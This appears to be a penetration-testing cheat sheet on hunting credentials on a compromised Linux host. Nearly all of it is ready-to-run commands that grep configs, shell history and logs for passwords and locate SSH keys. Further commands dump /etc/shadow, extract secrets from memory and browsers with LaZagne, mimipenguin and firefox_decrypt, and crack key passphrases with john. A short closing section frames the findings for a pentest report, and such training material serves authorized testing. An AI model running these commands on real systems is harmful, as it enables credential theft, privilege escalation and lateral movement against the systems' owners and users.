🛡️ Methodology Checklist
- History files:
cat ~/.bash_history; cat ~/.zsh_history - Config files:
find / -name "*.conf" -o -name "*.config" 2>/dev/null | xargs grep -l "pass" - SSH keys:
find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null - Browser saved credentials: Firefox profiles, Chromium Login Data
- Scripts with hardcoded creds:
grep -r "password\|passwd\|pwd" /opt /srv /home 2>/dev/null - Log files:
grep -r "password\|Authorization" /var/log 2>/dev/null - Crontabs and service configs:
cat /etc/crontab; ls /etc/cron.d/
🎯 Operational Context
Use when: Linux foothold acquired — systematically hunt for credentials in config files, history, environment variables, SSH keys, and service credentials.
Think Dumber First: grep -ri 'password' /etc/ 2>/dev/null and cat ~/.bash_history — run these immediately after getting a shell. History files are the most underrated credential source. Then check /var/www/html/ for database connection strings.
Skip when: Already have root — dump /etc/shadow directly instead of hunting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
for l in $(echo ".conf .config .cnf"); do find / -name "*$l" 2>/dev/null | grep -v "lib|fonts|share|core"; done | Find all config files by extension |
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib"); do grep "user|password|pass" $i 2>/dev/null | grep -v "\#"; done | Grep inside config files for credential keywords |
for l in $(echo ".sql .db .*db .db*"); do find / -name "*$l" 2>/dev/null | grep -v "doc|lib|headers|share|man"; done | Find database files |
find /home/* -type f -name "*.txt" -o ! -name "*.*" | Find text files and extensionless files in home dirs |
for l in $(echo ".py .pyc .pl .go .jar .c .sh"); do find / -name "*$l" 2>/dev/null | grep -v "doc|lib|headers|share"; done | Find scripts that may contain hardcoded credentials |
cat /etc/crontab && ls -la /etc/cron.*/ | Check system cronjobs for credential usage |
tail -n5 /home/*/.bash* | Check bash history for typed passwords/SSH commands |
sudo python3 mimipenguin.py | Dump cleartext creds from memory (GNOME Keyring, vsftpd) |
sudo python2.7 laZagne.py all | Run LaZagne — dump all stored credentials |
python3 laZagne.py browsers | LaZagne — browsers only |
ls -l ~/.mozilla/firefox/ | Locate Firefox profile directory |
cat ~/.mozilla/firefox/*.default-release/logins.json | jq . | View Firefox saved logins (encrypted) |
python3 firefox_decrypt.py | Decrypt Firefox stored credentials |
🔬 Deep Dive & Workflow
Search Priority by Location
- Config files — services store DB passwords, API keys, SMTP credentials in plaintext
- Scripts/cronjobs — automation scripts commonly hardcode credentials
- History files —
~/.bash_history,~/.zsh_historycapture typed passwords - Databases — SQLite files (Firefox, application data) contain stored credential data
- Memory — active sessions may have cleartext credentials accessible via mimipenguin
Config File Deep Search
# Find all .conf/.config/.cnf files, excluding system noise
for l in $(echo ".conf .config .cnf"); do
echo -e "\nExtension: $l"
find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done
# Grep inside .cnf files for keywords
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib"); do
echo -e "\nFile: $i"
grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#"
doneLog Analysis
for i in $(ls /var/log/* 2>/dev/null); do
GREP=$(grep "accepted\|session opened\|failure\|failed\|ssh\|password changed\|sudo\|COMMAND=" $i 2>/dev/null)
if [[ $GREP ]]; then echo -e "\n#### Log file: $i"; echo "$GREP"; fi
doneCommon logs: /var/log/auth.log, /var/log/syslog, /var/log/cron
Memory Credential Tools
- Mimipenguin — targets GNOME Keyring, vsftpd, SSH agent; requires root
- LaZagne — broader coverage: browsers, Wi-Fi, git, Docker, sysadmin tools (WinSCP, FileZilla)
Firefox Credential Decryption
Firefox encrypts saved logins in ~/.mozilla/firefox/*.default-release/:
logins.json— encrypted username/password pairskey4.db— encryption key database
Use firefox_decrypt.py to extract plaintext from both files together.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| grep on /etc returns too much noise | Too many false positives | Refine: grep -ri 'password' /etc/ --include='*.conf' 2>/dev/null | grep -v '#' |
| bash_history is empty or deleted | History disabled or cleared | Check: /root/.bash_history, /home/*/.bash_history, .zsh_history; also strings /proc/*/environ |
| SSH keys found but passphrase protected | Key encrypted | Try john: ssh2john id_rsa > id_rsa.hash && john id_rsa.hash --wordlist=rockyou.txt |
| Database config found but password hashed | Hash in config | Identify hash type with hash-identifier; crack with hashcat |
| linpeas/pspy not available | No internet or restricted shell | Run manual checks: find / -name '*.conf' 2>/dev/null | xargs grep -l 'pass' 2>/dev/null |
📝 Reporting Trigger
Finding Title: Plaintext Credentials Found in Linux Configuration Files Impact: Plaintext credentials stored in application config files, shell history, or environment variables allow immediate privilege escalation or lateral movement without requiring any vulnerability exploitation. Root Cause: Application credentials stored as plaintext in version-controlled or world-readable files. No secrets management solution implemented. Recommendation: Implement secrets management (HashiCorp Vault, AWS Secrets Manager). Restrict config file permissions to service account only. Clear shell history on shared systems. Audit all config files for plaintext credential storage.